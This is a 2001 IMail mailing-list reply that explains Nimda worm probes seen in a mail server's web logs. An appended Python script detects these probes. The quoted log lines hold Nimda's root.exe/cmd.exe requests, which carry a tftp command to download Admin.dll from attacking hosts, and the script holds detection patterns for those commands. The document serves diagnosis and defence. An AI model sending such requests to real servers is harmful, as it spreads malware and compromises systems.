>   We started seeing problems on Tuesday like everyone else, but we are 
> running IMail on a server by itself... No IIS. I am seeing a lot of 
> malformed header requests in the logs like the Code Red I & II virus does 
> to IIS servers ...

>20010918 111401 208.180.242.21, , , GET 
>/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll 
>HTTP/1.0

This is from the Nimda virus.  Computers that get infected with it will 
connect to pseudo-random IPs, and if there is a web server on them, will 
try a dozen different IIS hacks.  The fact that you are not running IIS 
doesn't make a difference; Nimda doesn't care about wasting bandwidth and 
other resources just because you aren't running IIS.

>and -- this is the odd part -- some BRO*.tmp files in my spool directory 
>that are most definitely being caused by people browsing WebMail.

That's normal.  IMail will create those files for web requests, such as the 
ones that Nimda is making.

>  It is causing web messaging to crawl, but other than that I have not 
> seen what everyone else seems to be seeing with the Nimda virus. No other 
> characteristics of the Nimda virus at all. I honestly do not believe that 
> we have been infected...

You are not infected, you are just being attacked by other servers that are 
infected.

>20010918 111401 208.180.242.21, , , GET 
>/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll 
>HTTP/1.0
>20010918 111401 208.234.121.72, , , GET 
>/MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll 
>  HTTP/1.0
>20010918 111401 205.218.122.146, , , GET 
>/c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20d:\Admin.dll

Note that these are all coming from different IP addresses.  It's not 
because of a problem with your server.

>   When I called the other day the assumption was that it was the Nimda 
> virus and the Ipswitch support guys said to run a virus program and 
> reload the web template files to fix it and that has done nothing at all 
> to help.

Ipswitch does seem to be pretty clueless about viruses (but, that's OK, 
since they aren't in the AV business).  They don't seem to realize that few 
(if any) viruses try to break back into the same machine they are 
running on.

>  I even went ahead and made the upgrade from 6.06 to v.7.03 Wednesday 
> night and no progress.

That won't do any good.  That's like buying a new telephone to try to get 
rid of crank calls.

>  I have all of the virus definitions for Norton and I've done SEVERAL 
> system scans with Norton, House Call and the FIX_NIMDA.EXE program from 
> Trend Micro and all came up empty handed. I just can't believe that the 
> Nimda has gotten into our system...

It hasn't.  You're just getting hit from other servers.

>Is anyone else seeing these BRO*.tmp files or is it just me?

Yes, anyone running IMail's web server on port 80 will see a large increase 
in those files when Nimda-infected computers connect to theirs.

>   This seems to be a problem specific to IMail's Web Messaging program 
> not properly filtering out these malformed requests.

No, it is simply sending the logon page that it is designed to return when 
a bad URL is given.

>When Web Messaging is off, the server runs like a dream. It is one thing 
>to patch an IIS server with a patch from the product vendor, but I 
>honestly don't have a clue as to what else I can do to stop this DoS 
>attack from happening on my IMail box without implementing a firewall 
>system for that server.

That's what you have to do.  No software can prevent a DoS attack that is 
simply flooding the server with requests.

                                                    -Scott
---
Declude: Anti-virus, Anti-spam and Anti-hijacking solutions for 
IMail.  http://www.declude.com
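As an added illustration, not part of the original post nor code from Declude or Ipswitch, the following Python parses log lines in the IMail web-log layout quoted above, flags the Nimda-style root.exe/cmd.exe plus "tftp ... Admin.dll" probes, and counts how many distinct source addresses are behind them (which is the point Scott makes: many infected hosts, not one broken server). The sample lines are constructed from the quoted ones plus one ordinary WebMail request from the placeholder address 192.0.2.10; the regexes and field names are assumptions of this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample in the quoted layout: date time source-ip, , , METHOD
# target HTTP/version.  The last line is a normal WebMail request for contrast.
SAMPLE_LOG = r"""
20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 208.234.121.72, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 205.218.122.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
20010918 111402 192.0.2.10, , , GET /mail/login.html HTTP/1.0
""".strip()

LINE_RE = re.compile(r"^(\d{8}) (\d{6}) ([\d.]+), , , (\S+) (\S+) (HTTP/\S+)$")
# Nimda aims at the root.exe backdoor left by Code Red II and at cmd.exe via
# traversal paths, then asks the victim to tftp Admin.dll from the attacker.
SHELL_RE = re.compile(r"/(root\.exe|cmd\.exe)$", re.IGNORECASE)
TFTP_RE = re.compile(r"tftp\s+-i\s+([\d.]+)\s+GET\s+admin\.dll", re.IGNORECASE)


def parse_line(line):
    # Split one log line into fields; None for lines in another layout.
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    date, time, src, method, target, version = m.groups()
    path, _, query = target.partition("?")
    # '+' and %20 both encode a space in the query part of these requests.
    return {"date": date, "time": time, "src": src, "method": method,
            "path": unquote_plus(path), "query": unquote_plus(query),
            "version": version}


def classify(entry):
    # Return the tftp server address if this is a Nimda propagation probe.
    if not SHELL_RE.search(entry["path"]):
        return None
    m = TFTP_RE.search(entry["query"])
    return m.group(1) if m else None


def summarize(log_text):
    # Count probes, distinct infected sources, and probes whose tftp address
    # is the source itself (the second quoted line names a different host).
    by_path, sources, self_fetch, total = Counter(), set(), 0, 0
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        total += 1
        tftp_ip = classify(entry)
        if tftp_ip is None:
            continue
        by_path[entry["path"]] += 1
        sources.add(entry["src"])
        self_fetch += tftp_ip == entry["src"]
    return {"requests": total, "probes": sum(by_path.values()),
            "by_path": dict(by_path), "distinct_sources": len(sources),
            "self_fetch": self_fetch}
```

Run against a real IMail web log, a `distinct_sources` value that keeps climbing while `probes` never hit a 200 response is the background-noise pattern described in this thread, and a firewall rule in front of port 80 is the only thing that stops the requests from reaching the server at all.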

An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/